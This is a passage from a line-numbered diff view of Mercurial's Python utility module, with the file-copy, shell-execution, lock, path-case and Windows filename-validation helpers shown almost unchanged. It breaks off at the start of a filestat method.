1181 return fileno and fileno() == sys.__stdout__.fileno()
1182 try:
1183 return fileno and fileno() == sys.__stdout__.fileno()
1184 except io.UnsupportedOperation:
1185 return False # fileno() raised UnsupportedOperation
1182
1186
1183 def shellenviron(environ=None):
1187 def shellenviron(environ=None):
1184 """return environ with optional override, useful for shelling out"""
1188 """return environ with optional override, useful for shelling out"""
1185 def py2shell(val):
1189 def py2shell(val):
1186 'convert python object into string that is useful to shell'
1190 'convert python object into string that is useful to shell'
1187 if val is None or val is False:
1191 if val is None or val is False:
1188 return '0'
1192 return '0'
1189 if val is True:
1193 if val is True:
1190 return '1'
1194 return '1'
1191 return pycompat.bytestr(val)
1195 return pycompat.bytestr(val)
1192 env = dict(encoding.environ)
1196 env = dict(encoding.environ)
1193 if environ:
1197 if environ:
1194 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1198 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1195 env['HG'] = hgexecutable()
1199 env['HG'] = hgexecutable()
1196 return env
1200 return env
1197
1201
1198 def system(cmd, environ=None, cwd=None, out=None):
1202 def system(cmd, environ=None, cwd=None, out=None):
1199 '''enhanced shell command execution.
1203 '''enhanced shell command execution.
1200 run with environment maybe modified, maybe in different dir.
1204 run with environment maybe modified, maybe in different dir.
1201
1205
1202 if out is specified, it is assumed to be a file-like object that has a
1206 if out is specified, it is assumed to be a file-like object that has a
1203 write() method. stdout and stderr will be redirected to out.'''
1207 write() method. stdout and stderr will be redirected to out.'''
1204 try:
1208 try:
1205 stdout.flush()
1209 stdout.flush()
1206 except Exception:
1210 except Exception:
1207 pass
1211 pass
1208 cmd = quotecommand(cmd)
1212 cmd = quotecommand(cmd)
1209 env = shellenviron(environ)
1213 env = shellenviron(environ)
1210 if out is None or _isstdout(out):
1214 if out is None or _isstdout(out):
1211 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1215 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1212 env=env, cwd=cwd)
1216 env=env, cwd=cwd)
1213 else:
1217 else:
1214 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1218 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1215 env=env, cwd=cwd, stdout=subprocess.PIPE,
1219 env=env, cwd=cwd, stdout=subprocess.PIPE,
1216 stderr=subprocess.STDOUT)
1220 stderr=subprocess.STDOUT)
1217 for line in iter(proc.stdout.readline, ''):
1221 for line in iter(proc.stdout.readline, ''):
1218 out.write(line)
1222 out.write(line)
1219 proc.wait()
1223 proc.wait()
1220 rc = proc.returncode
1224 rc = proc.returncode
1221 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1225 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1222 rc = 0
1226 rc = 0
1223 return rc
1227 return rc
1224
1228
1225 def checksignature(func):
1229 def checksignature(func):
1226 '''wrap a function with code to check for calling errors'''
1230 '''wrap a function with code to check for calling errors'''
1227 def check(*args, **kwargs):
1231 def check(*args, **kwargs):
1228 try:
1232 try:
1229 return func(*args, **kwargs)
1233 return func(*args, **kwargs)
1230 except TypeError:
1234 except TypeError:
1231 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1235 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1232 raise error.SignatureError
1236 raise error.SignatureError
1233 raise
1237 raise
1234
1238
1235 return check
1239 return check
1236
1240
1237 # a whilelist of known filesystems where hardlink works reliably
1241 # a whilelist of known filesystems where hardlink works reliably
1238 _hardlinkfswhitelist = {
1242 _hardlinkfswhitelist = {
1239 'btrfs',
1243 'btrfs',
1240 'ext2',
1244 'ext2',
1241 'ext3',
1245 'ext3',
1242 'ext4',
1246 'ext4',
1243 'hfs',
1247 'hfs',
1244 'jfs',
1248 'jfs',
1245 'NTFS',
1249 'NTFS',
1246 'reiserfs',
1250 'reiserfs',
1247 'tmpfs',
1251 'tmpfs',
1248 'ufs',
1252 'ufs',
1249 'xfs',
1253 'xfs',
1250 'zfs',
1254 'zfs',
1251 }
1255 }
1252
1256
1253 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1257 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1254 '''copy a file, preserving mode and optionally other stat info like
1258 '''copy a file, preserving mode and optionally other stat info like
1255 atime/mtime
1259 atime/mtime
1256
1260
1257 checkambig argument is used with filestat, and is useful only if
1261 checkambig argument is used with filestat, and is useful only if
1258 destination file is guarded by any lock (e.g. repo.lock or
1262 destination file is guarded by any lock (e.g. repo.lock or
1259 repo.wlock).
1263 repo.wlock).
1260
1264
1261 copystat and checkambig should be exclusive.
1265 copystat and checkambig should be exclusive.
1262 '''
1266 '''
1263 assert not (copystat and checkambig)
1267 assert not (copystat and checkambig)
1264 oldstat = None
1268 oldstat = None
1265 if os.path.lexists(dest):
1269 if os.path.lexists(dest):
1266 if checkambig:
1270 if checkambig:
1267 oldstat = checkambig and filestat.frompath(dest)
1271 oldstat = checkambig and filestat.frompath(dest)
1268 unlink(dest)
1272 unlink(dest)
1269 if hardlink:
1273 if hardlink:
1270 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1274 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1271 # unless we are confident that dest is on a whitelisted filesystem.
1275 # unless we are confident that dest is on a whitelisted filesystem.
1272 try:
1276 try:
1273 fstype = getfstype(os.path.dirname(dest))
1277 fstype = getfstype(os.path.dirname(dest))
1274 except OSError:
1278 except OSError:
1275 fstype = None
1279 fstype = None
1276 if fstype not in _hardlinkfswhitelist:
1280 if fstype not in _hardlinkfswhitelist:
1277 hardlink = False
1281 hardlink = False
1278 if hardlink:
1282 if hardlink:
1279 try:
1283 try:
1280 oslink(src, dest)
1284 oslink(src, dest)
1281 return
1285 return
1282 except (IOError, OSError):
1286 except (IOError, OSError):
1283 pass # fall back to normal copy
1287 pass # fall back to normal copy
1284 if os.path.islink(src):
1288 if os.path.islink(src):
1285 os.symlink(os.readlink(src), dest)
1289 os.symlink(os.readlink(src), dest)
1286 # copytime is ignored for symlinks, but in general copytime isn't needed
1290 # copytime is ignored for symlinks, but in general copytime isn't needed
1287 # for them anyway
1291 # for them anyway
1288 else:
1292 else:
1289 try:
1293 try:
1290 shutil.copyfile(src, dest)
1294 shutil.copyfile(src, dest)
1291 if copystat:
1295 if copystat:
1292 # copystat also copies mode
1296 # copystat also copies mode
1293 shutil.copystat(src, dest)
1297 shutil.copystat(src, dest)
1294 else:
1298 else:
1295 shutil.copymode(src, dest)
1299 shutil.copymode(src, dest)
1296 if oldstat and oldstat.stat:
1300 if oldstat and oldstat.stat:
1297 newstat = filestat.frompath(dest)
1301 newstat = filestat.frompath(dest)
1298 if newstat.isambig(oldstat):
1302 if newstat.isambig(oldstat):
1299 # stat of copied file is ambiguous to original one
1303 # stat of copied file is ambiguous to original one
1300 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1304 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1301 os.utime(dest, (advanced, advanced))
1305 os.utime(dest, (advanced, advanced))
1302 except shutil.Error as inst:
1306 except shutil.Error as inst:
1303 raise Abort(str(inst))
1307 raise Abort(str(inst))
1304
1308
1305 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1309 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1306 """Copy a directory tree using hardlinks if possible."""
1310 """Copy a directory tree using hardlinks if possible."""
1307 num = 0
1311 num = 0
1308
1312
1309 gettopic = lambda: hardlink and _('linking') or _('copying')
1313 gettopic = lambda: hardlink and _('linking') or _('copying')
1310
1314
1311 if os.path.isdir(src):
1315 if os.path.isdir(src):
1312 if hardlink is None:
1316 if hardlink is None:
1313 hardlink = (os.stat(src).st_dev ==
1317 hardlink = (os.stat(src).st_dev ==
1314 os.stat(os.path.dirname(dst)).st_dev)
1318 os.stat(os.path.dirname(dst)).st_dev)
1315 topic = gettopic()
1319 topic = gettopic()
1316 os.mkdir(dst)
1320 os.mkdir(dst)
1317 for name, kind in listdir(src):
1321 for name, kind in listdir(src):
1318 srcname = os.path.join(src, name)
1322 srcname = os.path.join(src, name)
1319 dstname = os.path.join(dst, name)
1323 dstname = os.path.join(dst, name)
1320 def nprog(t, pos):
1324 def nprog(t, pos):
1321 if pos is not None:
1325 if pos is not None:
1322 return progress(t, pos + num)
1326 return progress(t, pos + num)
1323 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1327 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1324 num += n
1328 num += n
1325 else:
1329 else:
1326 if hardlink is None:
1330 if hardlink is None:
1327 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1331 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1328 os.stat(os.path.dirname(dst)).st_dev)
1332 os.stat(os.path.dirname(dst)).st_dev)
1329 topic = gettopic()
1333 topic = gettopic()
1330
1334
1331 if hardlink:
1335 if hardlink:
1332 try:
1336 try:
1333 oslink(src, dst)
1337 oslink(src, dst)
1334 except (IOError, OSError):
1338 except (IOError, OSError):
1335 hardlink = False
1339 hardlink = False
1336 shutil.copy(src, dst)
1340 shutil.copy(src, dst)
1337 else:
1341 else:
1338 shutil.copy(src, dst)
1342 shutil.copy(src, dst)
1339 num += 1
1343 num += 1
1340 progress(topic, num)
1344 progress(topic, num)
1341 progress(topic, None)
1345 progress(topic, None)
1342
1346
1343 return hardlink, num
1347 return hardlink, num
1344
1348
1345 _winreservednames = {
1349 _winreservednames = {
1346 'con', 'prn', 'aux', 'nul',
1350 'con', 'prn', 'aux', 'nul',
1347 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1351 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1348 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1352 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1349 }
1353 }
1350 _winreservedchars = ':*?"<>|'
1354 _winreservedchars = ':*?"<>|'
1351 def checkwinfilename(path):
1355 def checkwinfilename(path):
1352 r'''Check that the base-relative path is a valid filename on Windows.
1356 r'''Check that the base-relative path is a valid filename on Windows.
1353 Returns None if the path is ok, or a UI string describing the problem.
1357 Returns None if the path is ok, or a UI string describing the problem.
1354
1358
1355 >>> checkwinfilename(b"just/a/normal/path")
1359 >>> checkwinfilename(b"just/a/normal/path")
1356 >>> checkwinfilename(b"foo/bar/con.xml")
1360 >>> checkwinfilename(b"foo/bar/con.xml")
1357 "filename contains 'con', which is reserved on Windows"
1361 "filename contains 'con', which is reserved on Windows"
1358 >>> checkwinfilename(b"foo/con.xml/bar")
1362 >>> checkwinfilename(b"foo/con.xml/bar")
1359 "filename contains 'con', which is reserved on Windows"
1363 "filename contains 'con', which is reserved on Windows"
1360 >>> checkwinfilename(b"foo/bar/xml.con")
1364 >>> checkwinfilename(b"foo/bar/xml.con")
1361 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1365 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1362 "filename contains 'AUX', which is reserved on Windows"
1366 "filename contains 'AUX', which is reserved on Windows"
1363 >>> checkwinfilename(b"foo/bar/bla:.txt")
1367 >>> checkwinfilename(b"foo/bar/bla:.txt")
1364 "filename contains ':', which is reserved on Windows"
1368 "filename contains ':', which is reserved on Windows"
1365 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1369 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1366 "filename contains '\\x07', which is invalid on Windows"
1370 "filename contains '\\x07', which is invalid on Windows"
1367 >>> checkwinfilename(b"foo/bar/bla ")
1371 >>> checkwinfilename(b"foo/bar/bla ")
1368 "filename ends with ' ', which is not allowed on Windows"
1372 "filename ends with ' ', which is not allowed on Windows"
1369 >>> checkwinfilename(b"../bar")
1373 >>> checkwinfilename(b"../bar")
1370 >>> checkwinfilename(b"foo\\")
1374 >>> checkwinfilename(b"foo\\")
1371 "filename ends with '\\', which is invalid on Windows"
1375 "filename ends with '\\', which is invalid on Windows"
1372 >>> checkwinfilename(b"foo\\/bar")
1376 >>> checkwinfilename(b"foo\\/bar")
1373 "directory name ends with '\\', which is invalid on Windows"
1377 "directory name ends with '\\', which is invalid on Windows"
1374 '''
1378 '''
1375 if path.endswith('\\'):
1379 if path.endswith('\\'):
1376 return _("filename ends with '\\', which is invalid on Windows")
1380 return _("filename ends with '\\', which is invalid on Windows")
1377 if '\\/' in path:
1381 if '\\/' in path:
1378 return _("directory name ends with '\\', which is invalid on Windows")
1382 return _("directory name ends with '\\', which is invalid on Windows")
1379 for n in path.replace('\\', '/').split('/'):
1383 for n in path.replace('\\', '/').split('/'):
1380 if not n:
1384 if not n:
1381 continue
1385 continue
1382 for c in _filenamebytestr(n):
1386 for c in _filenamebytestr(n):
1383 if c in _winreservedchars:
1387 if c in _winreservedchars:
1384 return _("filename contains '%s', which is reserved "
1388 return _("filename contains '%s', which is reserved "
1385 "on Windows") % c
1389 "on Windows") % c
1386 if ord(c) <= 31:
1390 if ord(c) <= 31:
1387 return _("filename contains '%s', which is invalid "
1391 return _("filename contains '%s', which is invalid "
1388 "on Windows") % escapestr(c)
1392 "on Windows") % escapestr(c)
1389 base = n.split('.')[0]
1393 base = n.split('.')[0]
1390 if base and base.lower() in _winreservednames:
1394 if base and base.lower() in _winreservednames:
1391 return _("filename contains '%s', which is reserved "
1395 return _("filename contains '%s', which is reserved "
1392 "on Windows") % base
1396 "on Windows") % base
1393 t = n[-1:]
1397 t = n[-1:]
1394 if t in '. ' and n not in '..':
1398 if t in '. ' and n not in '..':
1395 return _("filename ends with '%s', which is not allowed "
1399 return _("filename ends with '%s', which is not allowed "
1396 "on Windows") % t
1400 "on Windows") % t
1397
1401
1398 if pycompat.iswindows:
1402 if pycompat.iswindows:
1399 checkosfilename = checkwinfilename
1403 checkosfilename = checkwinfilename
1400 timer = time.clock
1404 timer = time.clock
1401 else:
1405 else:
1402 checkosfilename = platform.checkosfilename
1406 checkosfilename = platform.checkosfilename
1403 timer = time.time
1407 timer = time.time
1404
1408
1405 if safehasattr(time, "perf_counter"):
1409 if safehasattr(time, "perf_counter"):
1406 timer = time.perf_counter
1410 timer = time.perf_counter
1407
1411
1408 def makelock(info, pathname):
1412 def makelock(info, pathname):
1409 try:
1413 try:
1410 return os.symlink(info, pathname)
1414 return os.symlink(info, pathname)
1411 except OSError as why:
1415 except OSError as why:
1412 if why.errno == errno.EEXIST:
1416 if why.errno == errno.EEXIST:
1413 raise
1417 raise
1414 except AttributeError: # no symlink in os
1418 except AttributeError: # no symlink in os
1415 pass
1419 pass
1416
1420
1417 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1421 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1418 os.write(ld, info)
1422 os.write(ld, info)
1419 os.close(ld)
1423 os.close(ld)
1420
1424
1421 def readlock(pathname):
1425 def readlock(pathname):
1422 try:
1426 try:
1423 return os.readlink(pathname)
1427 return os.readlink(pathname)
1424 except OSError as why:
1428 except OSError as why:
1425 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1429 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1426 raise
1430 raise
1427 except AttributeError: # no symlink in os
1431 except AttributeError: # no symlink in os
1428 pass
1432 pass
1429 fp = posixfile(pathname)
1433 fp = posixfile(pathname)
1430 r = fp.read()
1434 r = fp.read()
1431 fp.close()
1435 fp.close()
1432 return r
1436 return r
1433
1437
1434 def fstat(fp):
1438 def fstat(fp):
1435 '''stat file object that may not have fileno method.'''
1439 '''stat file object that may not have fileno method.'''
1436 try:
1440 try:
1437 return os.fstat(fp.fileno())
1441 return os.fstat(fp.fileno())
1438 except AttributeError:
1442 except AttributeError:
1439 return os.stat(fp.name)
1443 return os.stat(fp.name)
1440
1444
1441 # File system features
1445 # File system features
1442
1446
1443 def fscasesensitive(path):
1447 def fscasesensitive(path):
1444 """
1448 """
1445 Return true if the given path is on a case-sensitive filesystem
1449 Return true if the given path is on a case-sensitive filesystem
1446
1450
1447 Requires a path (like /foo/.hg) ending with a foldable final
1451 Requires a path (like /foo/.hg) ending with a foldable final
1448 directory component.
1452 directory component.
1449 """
1453 """
1450 s1 = os.lstat(path)
1454 s1 = os.lstat(path)
1451 d, b = os.path.split(path)
1455 d, b = os.path.split(path)
1452 b2 = b.upper()
1456 b2 = b.upper()
1453 if b == b2:
1457 if b == b2:
1454 b2 = b.lower()
1458 b2 = b.lower()
1455 if b == b2:
1459 if b == b2:
1456 return True # no evidence against case sensitivity
1460 return True # no evidence against case sensitivity
1457 p2 = os.path.join(d, b2)
1461 p2 = os.path.join(d, b2)
1458 try:
1462 try:
1459 s2 = os.lstat(p2)
1463 s2 = os.lstat(p2)
1460 if s2 == s1:
1464 if s2 == s1:
1461 return False
1465 return False
1462 return True
1466 return True
1463 except OSError:
1467 except OSError:
1464 return True
1468 return True
1465
1469
1466 try:
1470 try:
1467 import re2
1471 import re2
1468 _re2 = None
1472 _re2 = None
1469 except ImportError:
1473 except ImportError:
1470 _re2 = False
1474 _re2 = False
1471
1475
1472 class _re(object):
1476 class _re(object):
1473 def _checkre2(self):
1477 def _checkre2(self):
1474 global _re2
1478 global _re2
1475 try:
1479 try:
1476 # check if match works, see issue3964
1480 # check if match works, see issue3964
1477 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1481 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1478 except ImportError:
1482 except ImportError:
1479 _re2 = False
1483 _re2 = False
1480
1484
1481 def compile(self, pat, flags=0):
1485 def compile(self, pat, flags=0):
1482 '''Compile a regular expression, using re2 if possible
1486 '''Compile a regular expression, using re2 if possible
1483
1487
1484 For best performance, use only re2-compatible regexp features. The
1488 For best performance, use only re2-compatible regexp features. The
1485 only flags from the re module that are re2-compatible are
1489 only flags from the re module that are re2-compatible are
1486 IGNORECASE and MULTILINE.'''
1490 IGNORECASE and MULTILINE.'''
1487 if _re2 is None:
1491 if _re2 is None:
1488 self._checkre2()
1492 self._checkre2()
1489 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1493 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1490 if flags & remod.IGNORECASE:
1494 if flags & remod.IGNORECASE:
1491 pat = '(?i)' + pat
1495 pat = '(?i)' + pat
1492 if flags & remod.MULTILINE:
1496 if flags & remod.MULTILINE:
1493 pat = '(?m)' + pat
1497 pat = '(?m)' + pat
1494 try:
1498 try:
1495 return re2.compile(pat)
1499 return re2.compile(pat)
1496 except re2.error:
1500 except re2.error:
1497 pass
1501 pass
1498 return remod.compile(pat, flags)
1502 return remod.compile(pat, flags)
1499
1503
1500 @propertycache
1504 @propertycache
1501 def escape(self):
1505 def escape(self):
1502 '''Return the version of escape corresponding to self.compile.
1506 '''Return the version of escape corresponding to self.compile.
1503
1507
1504 This is imperfect because whether re2 or re is used for a particular
1508 This is imperfect because whether re2 or re is used for a particular
1505 function depends on the flags, etc, but it's the best we can do.
1509 function depends on the flags, etc, but it's the best we can do.
1506 '''
1510 '''
1507 global _re2
1511 global _re2
1508 if _re2 is None:
1512 if _re2 is None:
1509 self._checkre2()
1513 self._checkre2()
1510 if _re2:
1514 if _re2:
1511 return re2.escape
1515 return re2.escape
1512 else:
1516 else:
1513 return remod.escape
1517 return remod.escape
1514
1518
1515 re = _re()
1519 re = _re()
1516
1520
1517 _fspathcache = {}
1521 _fspathcache = {}
1518 def fspath(name, root):
1522 def fspath(name, root):
1519 '''Get name in the case stored in the filesystem
1523 '''Get name in the case stored in the filesystem
1520
1524
1521 The name should be relative to root, and be normcase-ed for efficiency.
1525 The name should be relative to root, and be normcase-ed for efficiency.
1522
1526
1523 Note that this function is unnecessary, and should not be
1527 Note that this function is unnecessary, and should not be
1524 called, for case-sensitive filesystems (simply because it's expensive).
1528 called, for case-sensitive filesystems (simply because it's expensive).
1525
1529
1526 The root should be normcase-ed, too.
1530 The root should be normcase-ed, too.
1527 '''
1531 '''
1528 def _makefspathcacheentry(dir):
1532 def _makefspathcacheentry(dir):
1529 return dict((normcase(n), n) for n in os.listdir(dir))
1533 return dict((normcase(n), n) for n in os.listdir(dir))
1530
1534
1531 seps = pycompat.ossep
1535 seps = pycompat.ossep
1532 if pycompat.osaltsep:
1536 if pycompat.osaltsep:
1533 seps = seps + pycompat.osaltsep
1537 seps = seps + pycompat.osaltsep
1534 # Protect backslashes. This gets silly very quickly.
1538 # Protect backslashes. This gets silly very quickly.
1535 seps.replace('\\','\\\\')
1539 seps.replace('\\','\\\\')
1536 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1540 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1537 dir = os.path.normpath(root)
1541 dir = os.path.normpath(root)
1538 result = []
1542 result = []
1539 for part, sep in pattern.findall(name):
1543 for part, sep in pattern.findall(name):
1540 if sep:
1544 if sep:
1541 result.append(sep)
1545 result.append(sep)
1542 continue
1546 continue
1543
1547
1544 if dir not in _fspathcache:
1548 if dir not in _fspathcache:
1545 _fspathcache[dir] = _makefspathcacheentry(dir)
1549 _fspathcache[dir] = _makefspathcacheentry(dir)
1546 contents = _fspathcache[dir]
1550 contents = _fspathcache[dir]
1547
1551
1548 found = contents.get(part)
1552 found = contents.get(part)
1549 if not found:
1553 if not found:
1550 # retry "once per directory" per "dirstate.walk" which
1554 # retry "once per directory" per "dirstate.walk" which
1551 # may take place for each patches of "hg qpush", for example
1555 # may take place for each patches of "hg qpush", for example
1552 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1556 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1553 found = contents.get(part)
1557 found = contents.get(part)
1554
1558
1555 result.append(found or part)
1559 result.append(found or part)
1556 dir = os.path.join(dir, part)
1560 dir = os.path.join(dir, part)
1557
1561
1558 return ''.join(result)
1562 return ''.join(result)
1559
1563
1560 def checknlink(testfile):
1564 def checknlink(testfile):
1561 '''check whether hardlink count reporting works properly'''
1565 '''check whether hardlink count reporting works properly'''
1562
1566
1563 # testfile may be open, so we need a separate file for checking to
1567 # testfile may be open, so we need a separate file for checking to
1564 # work around issue2543 (or testfile may get lost on Samba shares)
1568 # work around issue2543 (or testfile may get lost on Samba shares)
1565 f1, f2, fp = None, None, None
1569 f1, f2, fp = None, None, None
1566 try:
1570 try:
1567 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1571 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1568 suffix='1~', dir=os.path.dirname(testfile))
1572 suffix='1~', dir=os.path.dirname(testfile))
1569 os.close(fd)
1573 os.close(fd)
1570 f2 = '%s2~' % f1[:-2]
1574 f2 = '%s2~' % f1[:-2]
1571
1575
1572 oslink(f1, f2)
1576 oslink(f1, f2)
1573 # nlinks() may behave differently for files on Windows shares if
1577 # nlinks() may behave differently for files on Windows shares if
1574 # the file is open.
1578 # the file is open.
1575 fp = posixfile(f2)
1579 fp = posixfile(f2)
1576 return nlinks(f2) > 1
1580 return nlinks(f2) > 1
1577 except OSError:
1581 except OSError:
1578 return False
1582 return False
1579 finally:
1583 finally:
1580 if fp is not None:
1584 if fp is not None:
1581 fp.close()
1585 fp.close()
1582 for f in (f1, f2):
1586 for f in (f1, f2):
1583 try:
1587 try:
1584 if f is not None:
1588 if f is not None:
1585 os.unlink(f)
1589 os.unlink(f)
1586 except OSError:
1590 except OSError:
1587 pass
1591 pass
1588
1592
1589 def endswithsep(path):
1593 def endswithsep(path):
1590 '''Check path ends with os.sep or os.altsep.'''
1594 '''Check path ends with os.sep or os.altsep.'''
1591 return (path.endswith(pycompat.ossep)
1595 return (path.endswith(pycompat.ossep)
1592 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1596 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1593
1597
1594 def splitpath(path):
1598 def splitpath(path):
1595 '''Split path by os.sep.
1599 '''Split path by os.sep.
1596 Note that this function does not use os.altsep because this is
1600 Note that this function does not use os.altsep because this is
1597 an alternative of simple "xxx.split(os.sep)".
1601 an alternative of simple "xxx.split(os.sep)".
1598 It is recommended to use os.path.normpath() before using this
1602 It is recommended to use os.path.normpath() before using this
1599 function if need.'''
1603 function if need.'''
1600 return path.split(pycompat.ossep)
1604 return path.split(pycompat.ossep)
1601
1605
1602 def gui():
1606 def gui():
1603 '''Are we running in a GUI?'''
1607 '''Are we running in a GUI?'''
1604 if pycompat.isdarwin:
1608 if pycompat.isdarwin:
1605 if 'SSH_CONNECTION' in encoding.environ:
1609 if 'SSH_CONNECTION' in encoding.environ:
1606 # handle SSH access to a box where the user is logged in
1610 # handle SSH access to a box where the user is logged in
1607 return False
1611 return False
1608 elif getattr(osutil, 'isgui', None):
1612 elif getattr(osutil, 'isgui', None):
1609 # check if a CoreGraphics session is available
1613 # check if a CoreGraphics session is available
1610 return osutil.isgui()
1614 return osutil.isgui()
1611 else:
1615 else:
1612 # pure build; use a safe default
1616 # pure build; use a safe default
1613 return True
1617 return True
1614 else:
1618 else:
1615 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1619 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616
1620
1617 def mktempcopy(name, emptyok=False, createmode=None):
1621 def mktempcopy(name, emptyok=False, createmode=None):
1618 """Create a temporary file with the same contents from name
1622 """Create a temporary file with the same contents from name
1619
1623
1620 The permission bits are copied from the original file.
1624 The permission bits are copied from the original file.
1621
1625
1622 If the temporary file is going to be truncated immediately, you
1626 If the temporary file is going to be truncated immediately, you
1623 can use emptyok=True as an optimization.
1627 can use emptyok=True as an optimization.
1624
1628
1625 Returns the name of the temporary file.
1629 Returns the name of the temporary file.
1626 """
1630 """
1627 d, fn = os.path.split(name)
1631 d, fn = os.path.split(name)
1628 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1632 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1629 os.close(fd)
1633 os.close(fd)
1630 # Temporary files are created with mode 0600, which is usually not
1634 # Temporary files are created with mode 0600, which is usually not
1631 # what we want. If the original file already exists, just copy
1635 # what we want. If the original file already exists, just copy
1632 # its mode. Otherwise, manually obey umask.
1636 # its mode. Otherwise, manually obey umask.
1633 copymode(name, temp, createmode)
1637 copymode(name, temp, createmode)
1634 if emptyok:
1638 if emptyok:
1635 return temp
1639 return temp
1636 try:
1640 try:
1637 try:
1641 try:
1638 ifp = posixfile(name, "rb")
1642 ifp = posixfile(name, "rb")
1639 except IOError as inst:
1643 except IOError as inst:
1640 if inst.errno == errno.ENOENT:
1644 if inst.errno == errno.ENOENT:
1641 return temp
1645 return temp
1642 if not getattr(inst, 'filename', None):
1646 if not getattr(inst, 'filename', None):
1643 inst.filename = name
1647 inst.filename = name
1644 raise
1648 raise
1645 ofp = posixfile(temp, "wb")
1649 ofp = posixfile(temp, "wb")
1646 for chunk in filechunkiter(ifp):
1650 for chunk in filechunkiter(ifp):
1647 ofp.write(chunk)
1651 ofp.write(chunk)
1648 ifp.close()
1652 ifp.close()
1649 ofp.close()
1653 ofp.close()
1650 except: # re-raises
1654 except: # re-raises
1651 try:
1655 try:
1652 os.unlink(temp)
1656 os.unlink(temp)
1653 except OSError:
1657 except OSError:
1654 pass
1658 pass
1655 raise
1659 raise
1656 return temp
1660 return temp
1657
1661
1658 class filestat(object):
1662 class filestat(object):
1659 """help to exactly detect change of a file
1663 """help to exactly detect change of a file
1660
1664
1661 'stat' attribute is result of 'os.stat()' if specified 'path'
1665 'stat' attribute is result of 'os.stat()' if specified 'path'
1662 exists. Otherwise, it is None. This can avoid preparative
1666 exists. Otherwise, it is None. This can avoid preparative
1663 'exists()' examination on client side of this class.
1667 'exists()' examination on client side of this class.
1664 """
1668 """
1665 def __init__(self, stat):
1669 def __init__(self, stat):
1666 self.stat = stat
1670 self.stat = stat
1667
1671
1668 @classmethod
1672 @classmethod
1669 def frompath(cls, path):
1673 def frompath(cls, path):
1670 try:
1674 try:
1671 stat = os.stat(path)
1675 stat = os.stat(path)
1672 except OSError as err:
1676 except OSError as err:
1673 if err.errno != errno.ENOENT:
1677 if err.errno != errno.ENOENT:
1674 raise
1678 raise
1675 stat = None
1679 stat = None
1676 return cls(stat)
1680 return cls(stat)
1677
1681
1678 @classmethod
1682 @classmethod
1679 def fromfp(cls, fp):
1683 def fromfp(cls, fp):
1680 stat = os.fstat(fp.fileno())
1684 stat = os.fstat(fp.fileno())
1681 return cls(stat)
1685 return cls(stat)
1682
1686
1683 __hash__ = object.__hash__
1687 __hash__ = object.__hash__
1684
1688
1685 def __eq__(self, old):
1689 def __eq__(self, old):
1686 try:
1690 try:
1687 # if ambiguity between stat of new and old file is
1691 # if ambiguity between stat of new and old file is
1688 # avoided, comparison of size, ctime and mtime is enough
1692 # avoided, comparison of size, ctime and mtime is enough
1689 # to exactly detect change of a file regardless of platform
1693 # to exactly detect change of a file regardless of platform
1690 return (self.stat.st_size == old.stat.st_size and
1694 return (self.stat.st_size == old.stat.st_size and
1691 self.stat.st_ctime == old.stat.st_ctime and
1695 self.stat.st_ctime == old.stat.st_ctime and
1692 self.stat.st_mtime == old.stat.st_mtime)
1696 self.stat.st_mtime == old.stat.st_mtime)
1693 except AttributeError:
1697 except AttributeError:
1694 pass
1698 pass
1695 try:
1699 try:
1696 return self.stat is None and old.stat is None
1700 return self.stat is None and old.stat is None
1697 except AttributeError:
1701 except AttributeError:
1698 return False
1702 return False
1699
1703
1700 def isambig(self, old):
